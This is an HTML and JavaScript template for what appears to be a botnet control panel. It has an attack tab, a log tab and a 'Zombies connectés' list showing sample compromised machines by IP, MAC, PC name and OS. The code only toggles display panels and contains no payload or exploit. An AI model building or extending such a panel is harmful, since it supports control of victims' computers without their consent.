<script type = "text/javascript">
<!--
function SwitchImage(id) {
	if (StrIsInStr(document.getElementById("switch"+id).src, "template/%default_theme%/up.png")) {
		Effect.SlideUp("supinfo"+id);
		document.getElementById("switch"+id).src = 'template/%default_theme%/down.png';
	}
	else {
		Effect.SlideDown("supinfo"+id);
		document.getElementById("switch"+id).src = 'template/%default_theme%/up.png';
	}
}
function StrIsInStr(str1, str2) {
	if ((str1.indexOf (str2)) != -1) {
		return true;
	}
	else {
		return false;
	}
}
//-->
</script>
<div id = "tab"><img src = "template/%default_theme%/zombtab.png" id = "tabimg"></div>
<div id = "active"><img src = "template/%default_theme%/client_c.png" id = ""></div>
<div><a href="user.php?log=%info_log%&sid=%info_sid%&tab=attack"><img src = "template/%default_theme%/attaque_a.png"  onmouseover = "this.src='template/%default_theme%/attaque_h.png'" onmouseout = "this.src = 'template/%default_theme%/attaque_a.png'"></a></div>
<div><a href="user.php?log=%info_log%&sid=%info_sid%&tab=log"><img src = "template/%default_theme%/log_a.png"  onmouseover = "this.src='template/%default_theme%/log_h.png'" onmouseout = "this.src = 'template/%default_theme%/log_a.png'"></a></div>
<div id = "wrapper"></div>
<div id = "zomblist">
<span class = "title">Zombies connectés</br>
<img src = "template/%default_theme%/splitbar.png"></span>
<div class = "zombbar">
<img id = "switch1" class = "updown" src = "template/%default_theme%/down.png" onclick="SwitchImage('1');">
<img class = "flag" src = "template/%default_theme%/flag/france.png">
<img class = "os" src = "template/%default_theme%/os/wvista.png">
<div class = "ip">192.12.10.1</div>
<div class = "macadr">FF:FF:FF:FF:FF:FF</div>
</div>
<div id = "supinfo1" class = "supinfo" style = "display:none;">
<div class = "suptext"><b>PCNAME :</b> ORDI_JOJO</br>
<b>LOCALGATEWAY :</b> 192.138.10.1</br>
<b>SECURE ID :</b> <font color = "green">d6aa97d33d459ea3670056e737c99a3d</font></br>
<b>ACTIVE RAM DETECTED :</b> 500MO</br>
<b>OS DETECTED :</b> Windows Vista</div></br>
</div>
<div class = "zombbar">
<img id = "switch2" class = "updown" src = "template/%default_theme%/down.png" onclick="SwitchImage('2');">
<img class = "flag" src = "template/%default_theme%/flag/vietnam.png">
<img class = "os" src = "template/%default_theme%/os/wxp.png">
<div class = "ip">75.136.15.1</div>
<div class = "macadr">FF:FF:FF:FF:FF:FF</div>
</div>
<div id = "supinfo2" class = "supinfo" style = "display:none;">
<div class = "suptext"><b>PCNAME :</b> WORK</br>
<b>LOCALGATEWAY :</b> 197.132.18.1</br>
<b>SECURE ID :</b> <font color = "green">d6aaed45f2c6d7a3670056e737c99a3d</font></br>
<b>ACTIVE RAM DETECTED :</b> 1000MO</br>
<b>OS DETECTED :</b> Windows XP</div></br>
</div>